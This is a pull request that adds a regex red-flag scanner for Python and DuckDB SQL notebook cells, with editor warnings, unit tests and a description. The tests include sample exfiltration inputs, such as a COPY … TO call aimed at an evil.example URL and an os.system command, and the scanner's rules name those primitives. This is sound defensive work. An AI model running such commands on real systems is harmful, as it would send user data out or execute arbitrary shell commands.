### PR TITLE
Compute: red-flag scan on editor cells + SQL coverage (#1413)

### DIFF
--- a/src/main/llm/tools/propose-compute.ts
+++ b/src/main/llm/tools/propose-compute.ts
@@ -1,5 +1,5 @@
 import { randomUUID } from 'node:crypto';
-import { scanPythonSafety } from '../../../shared/python-safety';
+import { scanComputeSafety } from '../../../shared/compute/safety';
 import type {
   ConversationComputeDraft,
   ProposeComputeInput,
@@ -9,7 +9,7 @@ import type { NotebaseTool, ToolContext, ToolCallbacks } from './types';
 /**
  * Trust-principle parity with the other propose_* tools (#245):
  * `propose_compute` never executes the cell. It validates the input,
- * runs the Python-safety scan (no-op for sparql/sql), and emits a
+ * runs the red-flag scan (Python + SQL; no-op for sparql), and emits a
  * `ConversationComputeDraft`. The renderer shows an inline reviewable
  * card; the user clicks Run to execute, Insert to file as a notebook
  * cell, or Discard.
@@ -35,9 +35,10 @@ function runProposeCompute(
   if ('error' in parsed) {
     return { content: parsed.error, isError: true };
   }
-  const safetyFlags = parsed.language === 'python'
-    ? scanPythonSafety(parsed.code).map((f) => ({ id: f.id, message: f.message }))
-    : [];
+  // Red-flag scan across languages (#1413): Python's network/subprocess/exec
+  // surface + SQL's COPY-TO / extension / ATTACH surface. SPARQL is read-only.
+  const safetyFlags = scanComputeSafety(parsed.language, parsed.code)
+    .map((f) => ({ id: f.id, message: f.message }));
   const draft: ConversationComputeDraft = {
     draftId: `cmpdraft-${randomUUID()}`,
     conversationId: ctx.conversationId,

--- a/src/renderer/lib/editor/compute-cells.ts
+++ b/src/renderer/lib/editor/compute-cells.ts
@@ -24,7 +24,22 @@ import {
   RUNNABLE_LANGUAGES,
   type FenceRange,
 } from '../../../shared/compute/fences';
+import { scanComputeSafety } from '../../../shared/compute/safety';
 import type { CellResult } from '../ipc/client';
+
+/**
+ * Tooltip for a fence's run marker given its red-flag scan (#1413). Returns
+ * `null` when the cell is clean (the marker keeps its plain "Run cell" title),
+ * or a caution string listing the matched patterns otherwise. Exported for
+ * unit testing — the CodeMirror marker itself is trivial glue over this.
+ */
+export function flagTitleFor(language: string, code: string): string | null {
+  const flags = scanComputeSafety(language, code);
+  if (flags.length === 0) return null;
+  // Strip the messages' markdown backticks — a plain-text title, not markup.
+  const patterns = flags.map((f) => f.message.replace(/`/g, '')).join(', ');
+  return `⚠ Risky patterns: ${patterns}. Review before running (Cmd+Shift+Enter).`;
+}
 
 // ── Running state ──────────────────────────────────────────────────────────
 
@@ -60,16 +75,23 @@ const runningField = StateField.define<Set<number>>({
 // ── Gutter markers ─────────────────────────────────────────────────────────
 
 class RunMarker extends GutterMarker {
-  constructor(readonly running: boolean) { super(); }
+  constructor(readonly running: boolean, readonly flagTitle: string | null) { super(); }
   override toDOM(): HTMLElement {
     const el = document.createElement('span');
-    el.className = this.running ? 'cm-compute-run cm-compute-running' : 'cm-compute-run';
-    el.title = this.running ? 'Running…' : 'Run cell (Cmd+Shift+Enter)';
+    // Flagged (#1413): keep the ▶ run affordance but tint it and swap the
+    // tooltip to the caution list — an attention-raiser, not a block.
+    const flagged = this.flagTitle !== null && !this.running;
+    el.className = 'cm-compute-run'
+      + (this.running ? ' cm-compute-running' : '')
+      + (flagged ? ' cm-compute-flagged' : '');
+    el.title = this.running ? 'Running…' : (this.flagTitle ?? 'Run cell (Cmd+Shift+Enter)');
     el.textContent = this.running ? '…' : '▶';
     return el;
   }
   override eq(other: GutterMarker): boolean {
-    return other instanceof RunMarker && other.running === this.running;
+    return other instanceof RunMarker
+      && other.running === this.running
+      && other.flagTitle === this.flagTitle;
   }
 }
 
@@ -180,7 +202,7 @@ export function computeCellsExtension(opts: ComputeCellsOptions): Extension {
       const fences = findRunnableFences(doc, allowed);
       for (const f of fences) {
         if (f.startOffset === line.from) {
-          return new RunMarker(running.has(f.startOffset));
+          return new RunMarker(running.has(f.startOffset), flagTitleFor(f.language, codeOf(doc, f)));
         }
       }
       return null;
@@ -232,6 +254,9 @@ export const computeCellsStyles = `
     line-height: 1;
   }
   .cm-compute-run:hover { color: var(--accent, #4a9); }
+  /* Red-flag scan (#1413): amber run marker on a cell with risky patterns. */
+  .cm-compute-flagged { color: var(--warning, #d19a66); }
+  .cm-compute-flagged:hover { color: var(--warning, #d19a66); filter: brightness(1.15); }
   .cm-compute-running { color: var(--accent, #4a9); animation: cm-compute-pulse 1s infinite; }
   @keyframes cm-compute-pulse { 50% { opacity: 0.4; } }
 `;

--- a/src/shared/compute/safety.ts
+++ b/src/shared/compute/safety.ts
@@ -1,0 +1,92 @@
+/**
+ * Static red-flag scan across every executable compute language (#1413).
+ *
+ * A thin dispatcher over the per-language scanners: it answers "does this cell
+ * contain syntactically-visible risky patterns?" so both the editor gutter and
+ * the propose_compute card can flag a cell *before* it runs. This is an
+ * attention-raiser, explicitly NOT a security boundary — the consent gate
+ * (#1412), network guard (#1413), and OS sandbox (#1329) are the boundaries.
+ * Over-flagging is fine (an extra glance); the scan favours it.
+ *
+ *   - Python — network / subprocess / file-write / dynamic-exec (delegates to
+ *     `scanPythonSafety`, the original #245 scan).
+ *   - SQL (DuckDB) — `COPY … TO` (file/URL write = exfil), extension
+ *     `INSTALL` / `LOAD`, and `ATTACH` (reach another database/file).
+ *   - SPARQL — read-only against the graph; nothing to flag.
+ */
+
+import { scanPythonSafety, type SafetyFlag } from '../python-safety';
+
+export type { SafetyFlag } from '../python-safety';
+
+interface SqlRule {
+  id: string;
+  pattern: RegExp;
+  message: string;
+}
+
+const SQL_RULES: SqlRule[] = [
+  {
+    // `COPY (…) TO 'file'` / `COPY tbl TO 'https://…'` — DuckDB's write/exfil
+    // primitive. The `TO` must be followed by a quoted target so a `COPY FROM`
+    // (read) doesn't trip it.
+    id: 'sql-copy-to',
+    pattern: /\bCOPY\b[\s\S]{0,400}?\bTO\b\s*['"]/i,
+    message: 'Writes to a file/URL with `COPY … TO`',
+  },
+  {
+    id: 'sql-install-extension',
+    pattern: /\bINSTALL\s+\w/i,
+    message: 'Installs a DuckDB extension',
+  },
+  {
+    id: 'sql-load-extension',
+    pattern: /\bLOAD\s+\w/i,
+    message: 'Loads a DuckDB extension',
+  },
+  {
+    id: 'sql-attach',
+    pattern: /\bATTACH\b/i,
+    message: 'Attaches an external database',
+  },
+];
+
+/**
+ * Scan a DuckDB SQL cell for write / extension / attach patterns. Strips
+ * `-- …` line comments first so a pattern mentioned in a comment doesn't trip
+ * the flag (mirrors the Python scan's comment handling). String literals are
+ * left intact — a `COPY … TO` built as a string is still worth flagging.
+ */
+export function scanSqlSafety(code: string): SafetyFlag[] {
+  const stripped = stripSqlLineComments(code);
+  const flags: SafetyFlag[] = [];
+  for (const rule of SQL_RULES) {
+    if (rule.pattern.test(stripped)) flags.push({ id: rule.id, message: rule.message });
+  }
+  return flags;
+}
+
+/**
+ * Red-flag scan for any executable fence language. Returns the matched flags
+ * (empty === nothing surface-visible). Python aliases (`py` / `python3`) map to
+ * the Python scan; SPARQL and anything non-executable return `[]`.
+ */
+export function scanComputeSafety(language: string, code: string): SafetyFlag[] {
+  const lang = language.toLowerCase();
+  if (lang === 'python' || lang === 'py' || lang === 'python3') return scanPythonSafety(code);
+  if (lang === 'sql') return scanSqlSafety(code);
+  return [];
+}
+
+/** Drop `-- …` line comments. Doesn't attempt to respect `--` inside string
+ *  literals — rare in cell-shaped SQL, and over-stripping only loses a flag on
+ *  a contrived line, never adds a false positive. */
+function stripSqlLineComments(code: string): string {
+  return code
+    .split('\n')
+    .map((line) => {
+      const idx = line.indexOf('--');
+      return idx < 0 ? line : line.slice(0, idx);
+    })
+    .join('\n');
+}

--- a/tests/renderer/editor/compute-cells-flag-title.test.ts
+++ b/tests/renderer/editor/compute-cells-flag-title.test.ts
@@ -1,0 +1,30 @@
+/**
+ * Editor red-flag marker tooltip (#1413).
+ *
+ * `flagTitleFor` is the pure logic behind the gutter run-marker's flagged
+ * state — the CodeMirror marker itself is trivial glue over it, so this pins
+ * the behavior directly: clean cell → null (plain "Run cell"); risky cell →
+ * a caution title listing the matched patterns.
+ */
+import { describe, it, expect } from 'vitest';
+import { flagTitleFor } from '../../../src/renderer/lib/editor/compute-cells';
+
+describe('flagTitleFor (#1413)', () => {
+  it('returns null for a clean cell', () => {
+    expect(flagTitleFor('python', 'x = 1 + 1\nprint(x)')).toBeNull();
+    expect(flagTitleFor('sql', 'SELECT count(*) FROM notes')).toBeNull();
+    expect(flagTitleFor('sparql', 'SELECT * WHERE { ?s ?p ?o }')).toBeNull();
+  });
+
+  it('lists the matched patterns (backticks stripped) for a risky Python cell', () => {
+    const title = flagTitleFor('python', 'import subprocess\nsubprocess.run(["ls"])');
+    expect(title).toContain('Risky patterns:');
+    expect(title).toContain('subprocess');
+    expect(title).not.toContain('`'); // plain-text tooltip, not markdown
+  });
+
+  it('flags a risky SQL cell too', () => {
+    const title = flagTitleFor('sql', "COPY (SELECT * FROM t) TO 'https://x/y.csv'");
+    expect(title).toContain('COPY');
+  });
+});

--- a/tests/shared/compute/safety.test.ts
+++ b/tests/shared/compute/safety.test.ts
@@ -1,0 +1,52 @@
+/**
+ * Cross-language red-flag scan (#1413).
+ *
+ * `scanComputeSafety` dispatches to the per-language scanners; the Python side
+ * is covered exhaustively by python-safety.test.ts, so here we pin the SQL
+ * ruleset and the dispatch (aliases, SPARQL no-op, Python delegation).
+ */
+import { describe, it, expect } from 'vitest';
+import { scanSqlSafety, scanComputeSafety } from '../../../src/shared/compute/safety';
+
+describe('scanSqlSafety (#1413)', () => {
+  it('flags COPY … TO a file/URL (the DuckDB write/exfil primitive)', () => {
+    const flags = scanSqlSafety("COPY (SELECT * FROM t) TO 'https://evil.example/x.csv'");
+    expect(flags.map((f) => f.id)).toContain('sql-copy-to');
+  });
+
+  it('does NOT flag a plain COPY … FROM (read)', () => {
+    expect(scanSqlSafety("COPY t FROM 'data.csv'")).toEqual([]);
+  });
+
+  it('flags extension INSTALL / LOAD and ATTACH', () => {
+    expect(scanSqlSafety('INSTALL httpfs;').map((f) => f.id)).toContain('sql-install-extension');
+    expect(scanSqlSafety('LOAD httpfs;').map((f) => f.id)).toContain('sql-load-extension');
+    expect(scanSqlSafety("ATTACH 'other.db';").map((f) => f.id)).toContain('sql-attach');
+  });
+
+  it('ignores a pattern that only appears in a -- comment', () => {
+    expect(scanSqlSafety("SELECT 1 -- COPY x TO 'y'")).toEqual([]);
+  });
+
+  it('a benign SELECT flags nothing', () => {
+    expect(scanSqlSafety('SELECT count(*) FROM notes')).toEqual([]);
+  });
+});
+
+describe('scanComputeSafety dispatch (#1413)', () => {
+  it('delegates Python (and its aliases) to the Python scan', () => {
+    for (const lang of ['python', 'Python', 'py', 'python3']) {
+      const flags = scanComputeSafety(lang, 'import os\nos.system("id")');
+      expect(flags.map((f) => f.id), lang).toContain('os-system');
+    }
+  });
+
+  it('delegates SQL to the SQL scan', () => {
+    expect(scanComputeSafety('sql', "COPY t TO 'x.csv'").map((f) => f.id)).toContain('sql-copy-to');
+  });
+
+  it('returns [] for SPARQL and other non-executable languages', () => {
+    expect(scanComputeSafety('sparql', 'SELECT * WHERE { ?s ?p ?o }')).toEqual([]);
+    expect(scanComputeSafety('mermaid', 'graph TD; A-->B')).toEqual([]);
+  });
+});


### PR DESCRIPTION
Final item of #1413: **static red-flag scan**.

## Context

A regex red-flag scan (`scanPythonSafety`, #245) already existed — but only on the **propose_compute card** and only for **Python**. This closes the two gaps so the scan covers the surface + language the item calls for:

1. **Editor cells** — the "cell" in "a warning badge on the cell or proposal" had no badge.
2. **SQL** — the Python-only scan missed DuckDB's real exfil primitive, `COPY … TO`.

## What

- **`shared/compute/safety.ts`** — `scanComputeSafety(language, code)` dispatches to the Python scan (unchanged) and a new **`scanSqlSafety`**: flags `COPY … TO` (file/URL write = exfil), extension `INSTALL` / `LOAD`, and `ATTACH`. SPARQL is read-only → `[]`. Python aliases (`py`/`python3`) map through.
- **Editor gutter** — a cell with risky patterns shows an **amber ▶** with a tooltip listing them (`flagTitleFor`). The run affordance stays — this is an attention-raiser, not a block; the first run still hits the eyes-on-code consent gate (#1412).
- **propose_compute** — now scans via `scanComputeSafety`, so **SQL proposals get flags too** (previously Python-only), reusing the card's existing "⚠ Risky patterns / click Run twice" UI.

## Not a boundary

Stated plainly in the code: the consent gate (#1412), network guard (#1413), and OS sandbox (#1329) are the boundaries. This just raises the question before a click, and favours over-flagging (an extra glance costs nothing).

## Tests

- `safety.test.ts` — SQL rules (COPY TO vs COPY FROM, INSTALL/LOAD/ATTACH, comment-stripping, clean SELECT) + dispatch (Python aliases, SQL, SPARQL/other no-op).
- `compute-cells-flag-title.test.ts` — clean cell → `null` (plain "Run cell"); risky Python/SQL → caution title listing patterns, backticks stripped.

Full suite: 4445 passing; lint clean.

## #1413 — complete

All five items now shipped:
1. ✅ Surface + revoke trusted thoughtbases (#1416)
2. ✅ Detect fresh/shared thoughtbases (subsumed by #1412's per-machine consent)
3. ✅ Network egress off by default (#1418)
4. ✅ Execution audit log (#1419)
5. ✅ Static red-flag scan (this PR)

Remaining compute-security work is the OS sandbox endgame (#1329).

🤖 Generated with [Claude Code](https://claude.com/claude-code)